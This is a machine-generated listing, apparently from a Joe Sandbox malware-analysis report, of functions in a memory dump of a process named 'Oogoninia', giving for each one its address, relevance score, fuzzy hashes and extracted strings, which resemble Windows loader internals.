                                                                                                                                                                                    Function 32527623 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .tR2
                                                                                                                                                                                    • API String ID: 0-1913366987
                                                                                                                                                                                    • Opcode ID: 95f0b8161fac95d1de66cb07ca77d8b93f6ae3261e3c8650ad025fa10bb56a65
                                                                                                                                                                                    • Instruction ID: f647cef6e9d05a4693080694719558468c508956fb50a6108dbdbed6f7abbbf4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95f0b8161fac95d1de66cb07ca77d8b93f6ae3261e3c8650ad025fa10bb56a65
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71615175A01706EFDB09CF78C480B9DFBB5BF88344F24866AD519A7380DB74AA41CB90
                                                                                                                                                                                    Function 325351C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$@
                                                                                                                                                                                    • API String ID: 0-149943524
                                                                                                                                                                                    • Opcode ID: f17788bade94a046b254c13c2cf1ff68e281867f07a2e1a24e43d6e63063ff03
                                                                                                                                                                                    • Instruction ID: d14e37eb7b4a10d1e28fba7ef518e9909775f4b854ce8c1e92fc077d5be60c05
                                                                                                                                                                                    • Opcode Fuzzy Hash: f17788bade94a046b254c13c2cf1ff68e281867f07a2e1a24e43d6e63063ff03
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC32D3B560A3518FD726CF14C48077EBBE1EF88748F50692EFA8587250EB74DA44CB92
                                                                                                                                                                                    Function 32525622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: c81ed4d879ca2208d4d3eb98adc94967ee8adcb7d3c9286de5e0dce5157698d4
                                                                                                                                                                                    • Instruction ID: 83a87ecc16117544ea928dc39e704a20c003bf1d9a4123fdb59e5f0515c47ee4
                                                                                                                                                                                    • Opcode Fuzzy Hash: c81ed4d879ca2208d4d3eb98adc94967ee8adcb7d3c9286de5e0dce5157698d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34319C31202B12BFE74A9F65CA40B8AFBA5BF84754F405125E90197AD0DBB4FA21CB90
                                                                                                                                                                                    Function 3259E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                                                                    • Opcode ID: 3d95ee323fd38a995d51350c01fc689aa0429423eb5ba7dde099bdb149ada38b
                                                                                                                                                                                    • Instruction ID: 8c9e053560e006f39399aebfdaff50a579abc48511e6eb52bb89979b694f25a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d95ee323fd38a995d51350c01fc689aa0429423eb5ba7dde099bdb149ada38b
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1613CB1A403089FDB15CFA8C940FADBBB9BB48744F50446EE549EB251EB71EE41CB90
                                                                                                                                                                                    Function 325FB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 325FB5C4
                                                                                                                                                                                    • RedirectedKey, xrefs: 325FB60E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                    • API String ID: 0-1388552009
                                                                                                                                                                                    • Opcode ID: 7f7e8314c74336c7a940278b2e7f1ba452b008e8c3ed9ebf6c896d4d54c8849a
                                                                                                                                                                                    • Instruction ID: 7ff2bab54167ef375cd08c7fb9bd014e3c49b1509ca9453c448864800e86c094
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f7e8314c74336c7a940278b2e7f1ba452b008e8c3ed9ebf6c896d4d54c8849a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A6102B5C42218FBDB11DF94C988ADEBBB8FB48704F50446AE905A7240DB759A85CFA0
                                                                                                                                                                                    Function 3253F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$$
                                                                                                                                                                                    • API String ID: 3446177414-233714265
                                                                                                                                                                                    • Opcode ID: 8f863459c6745c73d7f52690cba969a9f5d2abef4f86edee5ea5e9655621b755
                                                                                                                                                                                    • Instruction ID: 22426276e1eb2373c426f96c9ea9cceb9ebbabc8941979eed38aa9879f3d20f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f863459c6745c73d7f52690cba969a9f5d2abef4f86edee5ea5e9655621b755
                                                                                                                                                                                    • Instruction Fuzzy Hash: D861F175A02749DFEB26CFA4C590B9DFBB1BF84304F505469D605AB790CBB4BA81CB80
                                                                                                                                                                                    Function 325B314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                    • API String ID: 0-118005554
                                                                                                                                                                                    • Opcode ID: 7cf1aba1f86feaae183e33f4d24218c72d509711e4e906a656690ec2c91bbd8b
                                                                                                                                                                                    • Instruction ID: cccb603e6774a752b972f7b4634a401c5cef6dafc05c237c5b45d7ccfe95b2f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf1aba1f86feaae183e33f4d24218c72d509711e4e906a656690ec2c91bbd8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91312275209780ABD702CF68D840B1ABBE8EFD5718F440869F850DB380EBB5DA04CB92
                                                                                                                                                                                    Function 325206CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Q2$ Q2
                                                                                                                                                                                    • API String ID: 0-3867892922
                                                                                                                                                                                    • Opcode ID: 40ac72b498f949a1583585d5764d5a6014fdf4a50490bd1620ffc7bae831f6a9
                                                                                                                                                                                    • Instruction ID: 392fe461ff519e5e923fbc9d5e79ecd1e54cd888a1e28ccbe52fe572be12573a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40ac72b498f949a1583585d5764d5a6014fdf4a50490bd1620ffc7bae831f6a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A831C2376067019FD716DE24C890A9BBBA5AFE42A0F094929FC05972D0EE30DE05CBA1
                                                                                                                                                                                    Function 325531BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$InX2
                                                                                                                                                                                    • API String ID: 0-2486916426
                                                                                                                                                                                    • Opcode ID: 534f6a135255c00c93300b53338e6217db378a793c0759159895969fe48fce74
                                                                                                                                                                                    • Instruction ID: 74cb29695f5dc0e48c7cbe8a8e3a72e2ca804e636dcf16d8b77f086e56b3d26f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 534f6a135255c00c93300b53338e6217db378a793c0759159895969fe48fce74
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A3190B5509741AFD311CF28C880A9BBBE8EB95754F50092EF99983250D634DE09CBD2
                                                                                                                                                                                    Function 325533D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3259289F
                                                                                                                                                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 3259289A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                    • API String ID: 0-2653619699
                                                                                                                                                                                    • Opcode ID: e2b23b41957964911d773b035587dba5481f80980bdb4f783fad699c0caccee0
                                                                                                                                                                                    • Instruction ID: 729841c42f38f7d85ff5ab0bc7c8794dd97f28dfeb3f9f9090ba0cf1f91d4ad3
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b23b41957964911d773b035587dba5481f80980bdb4f783fad699c0caccee0
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF112976B00304FBF7198F48CD45F9B7BA8DBD8754F60846ABA04DB244DA74CF0186A0
                                                                                                                                                                                    Function 3259D69D Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: InX2$InX2
                                                                                                                                                                                    • API String ID: 0-577825928
                                                                                                                                                                                    • Opcode ID: b128784d180ddd0970180236f70e236a11a75381591b27d9da7b0822b13d185e
                                                                                                                                                                                    • Instruction ID: 8056d44478f2932bf57c26a2e1b2cf886e60d899cd65516489b0a4e8a9a46c94
                                                                                                                                                                                    • Opcode Fuzzy Hash: b128784d180ddd0970180236f70e236a11a75381591b27d9da7b0822b13d185e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1911E172500208BFCB069F6CE8809BEBBB9EF99354F50846AF944CB250DA75CE55C7A4
                                                                                                                                                                                    Function 3255A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                                                                    • Opcode ID: 670a20cf0ba1bafa521dc29aba7f47e5bdcc4fb8d80f1152ea0e5483d2526463
                                                                                                                                                                                    • Instruction ID: 669c5c353c79a2b602f92c763a2ae092e968fb743b0b46ad77469b9cc9c33dd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 670a20cf0ba1bafa521dc29aba7f47e5bdcc4fb8d80f1152ea0e5483d2526463
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8301FFB2151740AFE311DF24CE05F2677F8EB8471AF10897AE658C7590EB74EA44CB86
                                                                                                                                                                                    Function 3252C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: MUI
                                                                                                                                                                                    • API String ID: 0-1339004836
                                                                                                                                                                                    • Opcode ID: aa5d81a7d81a4ca0f69b6daad24edfdb1ccfb553f88f9e728972ca1147a56ec5
                                                                                                                                                                                    • Instruction ID: 5f9a925c89f90121a51d617524c036a59b7e40054ea17560677ea6a0ba88b1bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa5d81a7d81a4ca0f69b6daad24edfdb1ccfb553f88f9e728972ca1147a56ec5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C827C79E013188FEB24CFA9C980BADBBB1FF48354F518169D819AB2D1DB719A41CF50
                                                                                                                                                                                    Function 3257717A Relevance: 2.0, Strings: 1, Instructions: 705COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: DGO2
                                                                                                                                                                                    • API String ID: 0-4291922297
                                                                                                                                                                                    • Opcode ID: ced5e5a355272ef584782ec6cc7c1b4c4efd1b651f52a4f2a62a42e73be14751
                                                                                                                                                                                    • Instruction ID: 05db8316f93b94f4c8dbd8f50f995ad93ab70cdb71eab2ecbb4e1578499f80be
                                                                                                                                                                                    • Opcode Fuzzy Hash: ced5e5a355272ef584782ec6cc7c1b4c4efd1b651f52a4f2a62a42e73be14751
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A42C475A406168FDB08CF5DD490AAEBBB2FF88354F54856DD852AB340DB34EE42CB90
                                                                                                                                                                                    Function 325264F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 63107bbdb626808842cc2753c56f4b591e70cb4e3dd9454d5cc4ca8b2169cbbd
                                                                                                                                                                                    • Instruction ID: bd30a6ff3b5bfd162d146208ea4fb2cc6753496896de99ad7902b1d67688bf04
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63107bbdb626808842cc2753c56f4b591e70cb4e3dd9454d5cc4ca8b2169cbbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 37E19C7560A342CFD304CF28C090A5ABBE0FF89358F448A6DE99587391DB71EA05CF92
                                                                                                                                                                                    Function 3254B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @[a2@[a2
                                                                                                                                                                                    • API String ID: 0-988284378
                                                                                                                                                                                    • Opcode ID: 3962cc7c289ff213ad46d1ecf0dff031a72f03c4689714098d74e044c3017eba
                                                                                                                                                                                    • Instruction ID: 4013c6755d351ce64599b3d8636e23624bb8640f70ecc7432f7bc3ca3c04bfb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3962cc7c289ff213ad46d1ecf0dff031a72f03c4689714098d74e044c3017eba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4832B5B5E01219DBDF14CF58D880BAEFBB1FF94758F540129E805AB350EB75AA41CB90
                                                                                                                                                                                    Function 32521051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: cd380d3e4dd539d43df107360ec263f273254297a5143dcc355116024bc3440d
                                                                                                                                                                                    • Instruction ID: 88a4046ca583a540c6b7a6ab61e4d3cc052ee5dadd5c46a0d936515e81b4297c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd380d3e4dd539d43df107360ec263f273254297a5143dcc355116024bc3440d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56B113B55093809FD354CF28C480A5AFBF1BF88708F54896EE899D7392D771EA45CB82
                                                                                                                                                                                    Function 3252254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: 5d34e4370bc515308908e0c8d5bf8a90f0c1920812f4357a27d00ba8759e83ba
                                                                                                                                                                                    • Instruction ID: 134b4a3c100ad02767136b868866abd807fd2c9a2646b0584ca0fc0e50820a3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d34e4370bc515308908e0c8d5bf8a90f0c1920812f4357a27d00ba8759e83ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C418979942708CFD325CF28D950B59BBA5AF88354F50869AC416DB2E0DB70BF81CF41
                                                                                                                                                                                    Function 32524779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: aa53476ba16d910dcd9fff04ca13346961a3af6da4815102e6e50c276f20e4e3
                                                                                                                                                                                    • Instruction ID: 02693205d4f9523cbd3d2fc299da52e8a21e6457ff06e66c5c0bbf726c34f325
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa53476ba16d910dcd9fff04ca13346961a3af6da4815102e6e50c276f20e4e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9141F5756113C18FD315CF28C894B2ABBE9FF81366F50482DE9418B2E1DB70EA81CB91
                                                                                                                                                                                    Function 3251B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
